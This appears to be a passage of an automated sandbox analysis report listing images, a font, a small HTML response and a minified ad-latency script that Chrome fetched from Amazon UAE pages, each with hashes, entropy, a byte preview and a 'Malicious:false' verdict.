                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*........~.."...............................................................!.."1A.2Qa.#..BRbq..$r..3S...c.%6u...................................................!1A."2Qa.q......B....b.............?...4h..>(.ZN...q.I$....cP_.2c4Ds.....&.%.%.GWd..y.gA..#.c`...D.=V...iC...G""....T#.ss.)'.T.H%....K...)R8`.......G}w.s...c{.9N....J.g.nh...g...a...-.X>(n...Z..+IIE^.......mP=3...R....Q."....B.....bU.].v........K4.-..^c_%....+...AoG$#fM.t..gL.|W[.P.k.`R-...V.2....p....vs.k.......A.2..H....~.+..Y...r@7gS.....M.eV......d^D......8#.x..i;{L../..^...Q..)Y...U...Vx6..Ha/./.OI:..."Kd^..V.uv.n......*9.!.N...Y.v.....p.`.jY+.y..E..W.5I......7...O..y).jG..O..r...Y.e?..U.i5........B%..x..?..?R..Kz9*.~..%}..!,{X$l.={...?..x,...X. vl.......:......E.8 ..w.W..0D.<..P8.O.#..m.......US.G.....c...*.6@.Q.9......W..~......F.t.z.
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:HTML document, ASCII text
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):71
                                                                                                                                                                                                                                                                      Entropy (8bit):4.19644707821733
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:3:PouVIZxgRO5ZB1XbZ6iFi:haxUkZ3X96x
                                                                                                                                                                                                                                                                      MD5:6AAEF67381946BFC1DDACCA8CF7F6C36
                                                                                                                                                                                                                                                                      SHA1:E441BBA8B691AD0FFF0BCCB75974880018AB41D6
                                                                                                                                                                                                                                                                      SHA-256:73F8AE8C11DAA6AD905107970E55C3C64CD7133561E9E91E650AAB092BA7245E
                                                                                                                                                                                                                                                                      SHA-512:99039B90D4F3819EFB0A395D0DC810DEE1A56265D443D24D1C9BDF832EF9F95887E3C417253698A4F76EF176D0ACE6334905F4B7B4E6A8421D2F650B84255EC2
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://www.amazon.ae/rd/uedata?at&v=0.295396.0&id=3YMHCN1ADEMYQEW81YBE&ctb=1&m=1&sc=3YMHCN1ADEMYQEW81YBE&pc=7702&at=7702&t=1724264961738&csmtags=supports:mutationobserver:true|supports:getelementsbyclassname:true|supports:map:true|csm-feature-touch-enabled:false&pty=Landing&spty=BrowsePage&pti=15149894031&tid=3YMHCN1ADEMYQEW81YBE&aftb=1&lob=1
                                                                                                                                                                                                                                                                      Preview:<!DOCTYPE html><html><head><title>x</title></head><body></body></html>.
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 240x220, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):3486
                                                                                                                                                                                                                                                                      Entropy (8bit):7.643857105503464
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:96:TbVFSlefm7OHHTA8W3h/7Be1T+HRjr+7bbC13eA:tFUeu78HVW3ze1cRurpA
                                                                                                                                                                                                                                                                      MD5:8751895E930BB8E97813F18C2D7F4B15
                                                                                                                                                                                                                                                                      SHA1:2423AF95CD0CB2155E8F05FD775397BF0F48B035
                                                                                                                                                                                                                                                                      SHA-256:8EE1ACEB3E63974C278D061E28C152BA7FCC03C888571C30E5F7125CBC6E889D
                                                                                                                                                                                                                                                                      SHA-512:9DC2058A61D5D4B9AE417EDAFC8ADC8E7DD81D0170CF632F88D4663645320EE6010CA32DA8B496E70AD06D531D9BDB839F6D9059644EE6618F21ACF9E7322C1D
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:"https://m.media-amazon.com/images/I/3153Pv75-uS._SR240,220_.jpg"
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..........4.................................................................`....................................o..N..S....%:,.N..S....%:,v.|......G.h..d.*Y....3.X..>.x}:.p....i......c..E..i.5^..z.}....@...CO.4........>.b..~.i.6._-..u...8...ZE.Lx..yp..L..s........i.........E...[.....9...&N.'m.....M....l.+z5....O...yW$......C..}..,2>....W.h\p..N..)...O.]...+-..r...;7..h......zT.o.....+.]'...V.>......Z..}...l.L]LK...{.^M...M..#.t.o.8..1.....1zQ.xD..u..*J6....^.(h.....1a&j...m.._rT.6w...dS...k~..............................................?...,............................04. 1..!A2p35Q............i..Y.oj.\..5sF.h.....V.j.\..5sF.h.....W4Y..v.*..o6..5.Y{F..%%..JML.X.%..\.e../`.0`Y0L.6.#F...aH_.D....d.B..k.............D..g.R./vP....$..|...t#.r....7.^/zP..L...hE..+.x...r.0MC..~.=...>.....[1..
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (48840)
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):48888
                                                                                                                                                                                                                                                                      Entropy (8bit):5.316989310603465
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:768:1t0pkZtsaOoGHKsN3+xmxbQGdDYOeSYNkBc7J1VQzqr+JkqR6VhkPlN8Opgydi20:1t0ODIN/EOgJ1VQHZR6VO9N8OKydnpEj
                                                                                                                                                                                                                                                                      MD5:54586B09CF42FDBC1BC3F8D144A9C9CE
                                                                                                                                                                                                                                                                      SHA1:8792BBE8179A6965653EF878554BCF90C3807A3B
                                                                                                                                                                                                                                                                      SHA-256:A67E8235A7759CE78E2B5D3F145CFB07665F37F1257D1C8B80EB0136E1DD7784
                                                                                                                                                                                                                                                                      SHA-512:75F28B09EF56BBCCA53E66963F6DF228E284A2604A0692939838F0989A51B14DB0C49B1EA92E306B43DCD2AAD83E5ACD0CF427973C5F20074FEDCBBF0F564A64
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:(()=>{function e(e){return e&&e.__esModule?e.default:e}var t=function(e){return e.replace(/_/g,":")},i=/(\/b|\/s|\/l).*(node=)(\d{1,12})/,n=new Map,a=function(){if(!n.has(window.location.href)){var e=i.exec(window.location.href),t=e&&e[3]?e[3]:null;n.set(window.location.href,t)}return n.get(window.location.href)},o=function(e){var t=a();if(!e||!t)return null;var i=e.split(":");return i.splice(i.length-1,0,t),i.join(":")},s=function(e){var t=a();return t?"".concat(e,":").concat(t):null},r={wb:"ues",bb:"uet",af:"uet",cf:"uet",be:"uet",ld:"uex"},d=function(e){var i,n,a=e.latencyEvent,r=e.scope,d=e.placement,p=e.timestamp;l(a)&&(c(a,m(r),d.id,p),c(a,m(r),t(d.name),p),c(a,m(r),null!==(i=o(d.name))&&void 0!==i?i:void 0,p),c(a,m(r),null!==(n=s(d.id))&&void 0!==n?n:void 0,p))},l=function(e){return"function"==typeof window[r[e]]},c=function(e,t,i,n){void 0===n&&(n=new Date);var a=r[e];i&&"function"==typeof window[a]&&window[a](e,t+i,{wb:1},n)},m=function(e){return"adplacements:"+p(e)},p=functio
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 750x300, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):17885
                                                                                                                                                                                                                                                                      Entropy (8bit):7.904879679511873
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:384:1Tug6vQZk0rnz6kHo70bnvwSpDRbCx2n1:1Tv4z0rzbxzvw+DNgK
                                                                                                                                                                                                                                                                      MD5:4FE1CF1B9605301EC2676CF8F6A4E182
                                                                                                                                                                                                                                                                      SHA1:E33C0E2FCF0F7546D22143A718B37C1B263A00EE
                                                                                                                                                                                                                                                                      SHA-256:84ECCBE2FC7BE68B3E90D455B7666DAF8F75A4D6E4AB629A9FFB35D3A11A70D4
                                                                                                                                                                                                                                                                      SHA-512:46BBA7B87313203D5929BB41C0688D41D5F3304CEC73BF9929E93EAC99CBCA07632D52338F18CBF14EA016A6862BC2A958DA4353DA265CD946016233678123C4
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:......JFIF........................................................... ....+!.$...2"3*7%"0....................".........................."..............#........,...."...........................................................................&...g............uZf.>._..............}5....[..........."..~.....8Z.@...........`.....r.R..........x.m.|..&>=...............O.1...#..2...............(.s..+&.$.............m...\}...i.m+...........U,.5~gx.2V.d...h............,1.<...d..A...........c>../?~...c..t...........y.@....P.>..@...bd....&.@.....9..N/~.....:4....x...g.............:v?O~}...o....Q...t9...&./R.W...........SK{....P9.b...9F.Oa.n).;.t.....:._.....~?d.9................._|u.+`......4^..{>......y..H..<~u.Z%k(.......3.."..Sb.D..l)9....'.....Y`i*...............<......`9...5..,.........nk@...j.7._o..4................Ai.I....y....n............y......lX0k.@..}.f.........>...-.X.....n................7..J..i..^3_...}S.............4|...K....|...T.j}.H.......Z..;....m...0...
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 186x116, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):5643
                                                                                                                                                                                                                                                                      Entropy (8bit):7.864358643933752
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:96:72+xCzZeYanEyL8iJJIBIkGuqP5RzZwEnKpetcpXReNjK3GFt36A64NZJuum4:7BxCYY6RJI6u05TznKUtnNOW7qGs4
                                                                                                                                                                                                                                                                      MD5:1B495C1094AA339C163BE7E7F972372E
                                                                                                                                                                                                                                                                      SHA1:C50629D2B9A4A520AA0DAA96FBFB882E50F11497
                                                                                                                                                                                                                                                                      SHA-256:BB6ED509542D9A6EDE5BF7B1BADDF3E203698283E836F2819ED1108AFF750989
                                                                                                                                                                                                                                                                      SHA-512:671683DFD700F7A506562FD99014A42BAE189F656236DBAFDD70E0229CA8C85829078141CE10D9727DFC76CAC01903650A065286069900D62F0B039021D5E03C
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:......JFIF......................................................................................................................................................t...."..........9.........................................................................7............~....WT{eW..N1...E.}..H.P.........=..J......0...i........}..T....P1........a.5......."t.`.Nr..z.v......y...Z(.......).]..$.l.Q"...v....+y...5.`6(.......tj~.S...y.+...]3E....O.b-...D..q.G...2`m.J.u..:f...;..:....==._....u.f...j..k.^..."2....UXf@.SG2^.Qg.. .....].%t.&nG`.......p...'...y.@..-.K....*......V....~.}i.................R..........................!1A....Qa...%045q......"$6D#&RTUe.2BPbu... (@EFdv.............?.....0.[.v.....$\\_..v......L......u.}..v.g.)UH..s...9..?k.f.d52..i.H.s$......,.n|.QH....N........U.../*..8JU.N.......:._.ak8.."P9T........T..;..f..*.4.LY(......p.....[M;pk...+..jBp.#v.._.$.G..K....U.D......G.JhE'.._h|q@.;TRz.3`.5.....'xI.."......O...H........n..V.V..>.".u.....CI..}..
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:Web Open Font Format (Version 2), TrueType, length 17336, version 1.655
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):17336
                                                                                                                                                                                                                                                                      Entropy (8bit):7.986832176880709
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:384:e5synBGYXpmI4lCKsduXVgswk7BlSOSEtMoFr2h:usyJXpmDlgex73R1qox2h
                                                                                                                                                                                                                                                                      MD5:B39E082C6B983705892045FD87E0B9A8
                                                                                                                                                                                                                                                                      SHA1:9CC1BB64EB270135F1ADF3A4881C2EE5E7C37BE5
                                                                                                                                                                                                                                                                      SHA-256:CB0F25CA005489D2399434C33762F291BD8746714EAE3AA72DE20ACA08EDC458
                                                                                                                                                                                                                                                                      SHA-512:DDBB8B598854DD829BEFB27641B1C56F23FCE55283D3FA33F0BFDA1C3B38CE7DC03A799E84902C580BA8A54361D33A49038368C96D9FCDE6A50FE83514774D17
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://m.media-amazon.com/images/S/sash/WOnTLzkiaEccV7F.woff2
                                                                                                                                                                                                                                                                      Preview:wOF2......C...........CS........................?FFTM..8.....@.`..~........!.6.$..F..<.. .....a?webf...5l.......?..`..0p....{..Tj....?%........X.....,..UU.o.J(x...g.HK.I..EW.....<...o.RS.,.D.[Xv.s^SW.<..Y0...@..e...t*...J$%?..BGb.axC.....hc.P...z7/.m...=!........LET.K...N....W..DOc.x~..>!...."V...D.*.v."..tQ.*t.?OG..y3.../.F..qB.%..@..\..*y.2w.7GKB..7).1..p^u...MJ...O.D......m..3..1....5..,...!..x|8Xo.y.!..A w.T...'2.M^&/''...V.D*.Hl......$..D".JeR.L*..d"t...6}.c.2.Zkx.....!A%.q...b....$XJ..SJ...01&*..X.../.@..n....o...........ow.......$.RB.7...L.Ip.........dOU.......O.w.....Y.[k[.^MR ...v...6...>.........uYZ[.-k...Y.L.@...j...../r..`g>..C..R.rw%..`...p.&q..)(.......z...-H..N....)rI%.B..C.B..K.*..u...2.E.t.g.>....?..7._....Z.~....t.'.bj.`.|M.g..fi.X..D.HU.e.Yz..t....dk.t.0...1r.R.v.E.........}....I.?.....%.T.;.`!,.o....B..^.z....b.!BB$Dd.....a}.j!.+..A.A...4"M#"..9..el......A.j..#?"...}...."..#...8k..._.x..|...c........5.H...."-..a.p.p?..b..K....~.*..
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 186x116, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):2974
                                                                                                                                                                                                                                                                      Entropy (8bit):7.783838065415687
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:48:TT0r6xxKRTce7RbbYxl2D4y4llhyitJ4qoKo3eYs0+G1lEtbbp8MxQjIzz:TJARTcAbd2/hBkJJeY/LlEtbF8MxQsP
                                                                                                                                                                                                                                                                      MD5:7F46081DE151EF8F9A7C6BB270425932
                                                                                                                                                                                                                                                                      SHA1:5FAA281FF0ACE8BC9F979DF91CAA898C9F808FA4
                                                                                                                                                                                                                                                                      SHA-256:B70C6DCC5355E0EC0DA60CA116E88F5A8E6EED57D1D2B430812155C1B27698D4
                                                                                                                                                                                                                                                                      SHA-512:E3840AA124C73CF3FE708D4A228CD2A7FB9AA5AB5A1210CED188BE42540409E62D36CD22E14A8FABD88954E23007746021FE259948DC1F4B39B3A72051D11922
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......t...."...............................................................!1.."AQ..2.BRaq....#3Sbcr$C.D.........................................................?..R..R..R..R..R.D......I=...U5..k.m%xt...o[.c...1.W.Q..Dn...{.T."......7..#hiZ...N.....~zIk..~.......K..,..].....q'?(.....it..[{.p..0..<d.H......R..R..R..R..R..R..R.......".gb..Te.....I.UW.fi.f/{..k16?.e..D...v..;2h./+....0....&..ms.....ys<...m(...Z.$.?.G..$.z.N}._..|.~...U..%.I.5.......t....v..h=zf.......m..~..1....z?....o.c.Wi..2.T..$..'-.....:... ..T.:....jCM..-,..^.._GE2.?.p.55.T.*!JR.JR.JR.JR.JR.JR.X.f.qey.....R2.u .0k%P.......-..:s2..d.Qo.1A...d..E.....82C.e....(.*8.....lP"....}p.......cXH....(.to..>a.......V..g.&H.OR.... ~.........+.`.."y..L(..C...`...Mx..5hf......y..:?]......dj.2.:.|.....67zm..L.H#dY..&0.tI.)$,..$H..NE{.k9.9.....2|Q
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 440x500, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):31007
                                                                                                                                                                                                                                                                      Entropy (8bit):7.962341771324061
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:768:1hWm6712DI62uZymE9rC+cTE49GZVPrDGoeCO8Az+7:2m6712zGdcMZV1O8Ae
                                                                                                                                                                                                                                                                      MD5:1F517782D80570ADA413820FC88CB154
                                                                                                                                                                                                                                                                      SHA1:45A4523A3296C1FCA960146ABAA1A7A1B9AE0491
                                                                                                                                                                                                                                                                      SHA-256:4C629536C1CC6991BDEF1B69C13C06812C4164D26187707B2B48293FC7F5E0C5
                                                                                                                                                                                                                                                                      SHA-512:D2AC0798FB10510ED7972405A43FBA40CB9604D6F4B5099C989157F4B04668F73B7FA4EC0BE0C6850D2EE7447877FDAD0AC079E63C9057DB8B630A09554A2C25
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://images-eu.ssl-images-amazon.com/images/G/39/sports-outdoors/revamp2022/EN-L2-Activities-Cycling-440x500.jpg
                                                                                                                                                                                                                                                                      Preview:......JFIF........................................................... ....+!.$...2"3*7%"0....................".........................."..............#.............".................................................=\..D.A.j .8|.UUh.ED...(".r.....DEW.Uk....8.. .5...#.r...D,X|p5Z...p..PT.F.8..(.."4h...[..F.L..F........F.....Y...U..q.{._....G..QT.......qD.F..Z.PD.y...;(y..99{9......DF..F...5.:&.. .J.).../....7....... (.A..5.C..>Kh.9.Fq...<..<...tb.|..[.....D.....N.W"..s.F..s\Oi...0.?..$gi..cG*..A..#..ATAA../)..9.>...nx.,.6..=E........E..*...7.....76..?.........^..1..@EH&.TD.. ......y.;=.r.]7......"(..`u.....A.T^R'.d..s.],..."(.......$..p4.......C..e.Z.}7.(........S..j...W8...O.4.....lc.....F..."#A-9DA......N....A..Z\.#E.....".."....(+0r.....cW#...}..P...x8...UUU..&>6.+)L...DDw..J.E.V.......UP..P....2.!.|....5..*7... ...U........O.zm...3.\..:..u..Z&....#.._.A@F..H9.b-..y.:..g...}s....3...M.~r.....UDj....*.....r|.....vY4..W...d......L..T.DDQ.......sx.Y..k....`...
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 400x400, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):11395
                                                                                                                                                                                                                                                                      Entropy (8bit):7.900504506758376
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:192:YFoKfC8FTMzA7MVHeIL4xoeGcH2zL4a4KVCK5GBQks4SzPYeV9S:u68xXGcH8L4a4KVtsez6
                                                                                                                                                                                                                                                                      MD5:1BC1451C4CAC3EA83E34C2C383EEF101
                                                                                                                                                                                                                                                                      SHA1:F93DFE6BA318BCC442D6C9B961E71CED93B04EF7
                                                                                                                                                                                                                                                                      SHA-256:ECB2398C5D0A7E58B133C795847455150F12C20C384F94A825CBA2C0680F8B95
                                                                                                                                                                                                                                                                      SHA-512:36B95A4208965CEB6A483CD4387571C4B15835AA48299733552B495EFA77FF09F0B564E9E81ED70C919DF7C5B7F19CE87C19B1AA883517FC752EE865929C504B
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://images-eu.ssl-images-amazon.com/images/G/39/AE-hq/2022/img/Sports/XCM_Manual_1521089_5259758_400x400_2X._CB617696541_.jpg
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................................................................................................................."..........2.........................................................................}.....3.C<.e...%....................6.e.b|.....7...{.|.z.}..{.~..QgB._..,...........\W.<..O@.......y(..9.8ts.......Z.Ws...\!(......1......Z!....=.|...nU..&...u|..U..}.uh.v....'..e_....,........t.:@.....W....v....uk.Z.....~.h..`....O,.+....).....'....H.....tJ......)Wz..}p.....D............m.........U...=........|.Y\.DOJ....]!...KS.5..`........w<.........8u......'_M..[6tQ.............p.....a..5..T...G&.Q......p.....\r...9x......=.n....9pi.f.......r..H...............L\.^.E..\.J1u.-l....&....V..`...........G!....!..........*R'G".1Y..:..a..:I~|..M.g.........`.....E.C.q.H........-...b.W......#..GA-.X.|..7\<......)).1..............J...2ls.....j ...K.=-c3`........0.=..y..|..Z@.......e.........i..).h....)..Fv
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=0], progressive, precision 8, 1500x600, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):37419
                                                                                                                                                                                                                                                                      Entropy (8bit):7.937127031508407
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:768:8o5vu1HQZYJ6tT20eEseZDurX/U7+Y9eYe7axwIlR9q:hmK/lseZDu7UmYe7aSWRU
                                                                                                                                                                                                                                                                      MD5:C2B2663B7B307CCF7E78A827952EE635
                                                                                                                                                                                                                                                                      SHA1:A8895D0213035F00116B792274F7AB66B7DC6BAF
                                                                                                                                                                                                                                                                      SHA-256:1B1EE3D875ABFA85284B12CC7F1DE4F265E16E45C8F7A7C385FD1C2551C2F23A
                                                                                                                                                                                                                                                                      SHA-512:1E5B0A2A21FEF7C1F261DA3BB534974B2BA5AA48E5FDB4C54E33A4366EA02CE3AABF65532E5F700188800ACB66267C1ABEF64C3C3D115AFEBD2D46C4A8D1942F
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:......JFIF..............Exif..II*.................Ducky.......F......http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.1-c002 79.a6a63968a, 2024/03/06-11:52:05 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:DocumentID="xmp.did:E76D9EEB4FDB11EFA1089C0DB44280A6" xmpMM:InstanceID="xmp.iid:E76D9EEA4FDB11EFA1089C0DB44280A6" xmp:CreatorTool="Adobe Photoshop 2024 Windows"> <xmpMM:DerivedFrom stRef:instanceID="BAD84EA065AEB6F4371E8144F077EB94" stRef:documentID="BAD84EA065AEB6F4371E8144F077EB94"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d...................................................... ....+!.$...2"3*7%"0....................".........................."...
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 480x440, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):16314
                                                                                                                                                                                                                                                                      Entropy (8bit):7.907857771232607
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:384:Lk5QbJmWBprbQwfMbsckM345KEEYj87ZtQ6gy0HZ+IacUFm:45eJmWBprbQbbs234pEYw7yH+l2
                                                                                                                                                                                                                                                                      MD5:045A383CC6382ECC07998EC479B37EC6
                                                                                                                                                                                                                                                                      SHA1:4C50FA5E3BFE0386392EAB08FB148F8CAD010ED7
                                                                                                                                                                                                                                                                      SHA-256:4B088F3281E6D558D1E0A4F9032DEFA47A7A9D05455A944DADCB7BD4E1FE1261
                                                                                                                                                                                                                                                                      SHA-512:2F722404DA84BE4F62275237CC69EA985E3132BB8FF1E96E0C61BC86EE08093083D3A89024EA75E3CC00C3AB0797C347FA84F5289B4F46AC756C4CFDB6F74476
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..........5..................................................................,...............................>}M..[s.w.{c.g..s>.....g..O.g>.|[.>.|.D...'..E_...O.................'.s}C..%..>y..dG.Z.5..T......w...~......;.....r............_..l..............=..I...03..5.5.Z.W<..If.1r......k.\...}..lz................6..).yby...5...H&..UL.i7%.....9.XzX.).[.6...................h%0....S....N...u..wu........9.qdY.)...&....................Hc.X..,.=u.qV...{..X3.\.p.5i.r.2.JS.h...............s..:l.3.2....).o..=..i ..r....g%.).2.)[{...............y.t<.)...#.&.S.l5.H$..Z..P.l'.94.JZ.....................w..M..HG.q...KW..+.\.j...k.....O-y.sA1...A.................c.y.G..u..Q..e:..<`&........NO=y.SA9.A................s..8_....":..5.....^j.<'.........Mb....LG.s.................I..."(......~.g.(....4..-].x
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 186x116, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):3063
                                                                                                                                                                                                                                                                      Entropy (8bit):7.802286401990765
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:48:TT0r6RUmnqUeL1u4vTUOnbt/1N4PlauRLU2DKPkIdS+JKDaogAXUvafFtCzpi:TpUdpRD19oHJWQZaRavtApi
                                                                                                                                                                                                                                                                      MD5:02E9CBC339C037FE92496F50A8CF222B
                                                                                                                                                                                                                                                                      SHA1:A48FEFDE48EB6A796516D3A6A3EFFB9F8472B091
                                                                                                                                                                                                                                                                      SHA-256:BFF13D9E9AA8123C516F4625D7788D1894FA3B5CC9D41E95872A3E5E39F57E4B
                                                                                                                                                                                                                                                                      SHA-512:5B9AE48FF56A46EAC8D5C5E8DF7EE5EBBB5869CB3BAB6492BEEBF54779CC7820D997FF33EE4127E247D8823FB5BBEB7B315A17F66826ECE1C5ABB8C096F35714
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://images-eu.ssl-images-amazon.com/images/G/39/home/janiceo/dqc_experiment/xcm_banners_tr_bts21_372x232_pp-ezsdz_372x232_ae-en._SY116_CB643136719_.jpg
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......t...."................................................................!1..A."Qaq..2..#D...CR.................................................!...1A.."2.............?..Q..DD..=......z.h<_.....b.C5...*......Q.e...<.....DD....D@...DD....D@...DD....D@).;..2.+.....lj..O9|S...?Es.U.N..n.;.I.ll...{.'.....&....o.xO..1.>}{.syW/K.-.[..;.m.J..F..4.'h.V.j%....*.C+...a. ..1.....g.aW.f9..d;Qr?k|....*C,.k.>k.............V.\W"r.6.e.zJi4....1.=B..........O.9....m...=..wo.c$.;.G.....{+...c.C...Td2.:>..x.....b=.)..yE.....ven...O`....D@...DD....D@...DD....V.)z.]GvV...R.......U.Q.`1M..)..;..k...L...G2.......{.....x:k.....h]..:.AwU.g:t<E.K+.[.Y..)[..e......`..m.{.u...._..[.I;._...f.9Z.[Xv..8(..F:..!....&RVp...cjU>......?...#.gG#...U=...m.O.C.e..-.i.}...T.....PO......&|....r.]'........ ......^....O.w...N...S..h...D@.
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, baseline, precision 8, 440x400, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):34824
                                                                                                                                                                                                                                                                      Entropy (8bit):7.943271633446015
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:768:VuPrScB3FO+CXYsHO+tJzzdemh68lpICZ:SFOhYQtRzd9lpICZ
                                                                                                                                                                                                                                                                      MD5:2841C3468407AD7E0AC973D7E51894DB
                                                                                                                                                                                                                                                                      SHA1:83C4670EC53B6F756FF3FE0FF498C78C507041D2
                                                                                                                                                                                                                                                                      SHA-256:984D6D320E61F26055B9961268C6B38E975C04C5BB310D6ECEDD5CB27AD1E176
                                                                                                                                                                                                                                                                      SHA-512:DFD606DF2F4F3A819825639D7426B70886D9D15F4C651986BDEB83E49B23A03CF60543CFBAA6E530BBE20AD24C7B96A3C3463F8508C5BA7A395CB5C68C062689
                                                                                                                                                                                                                                                                      Malicious:false
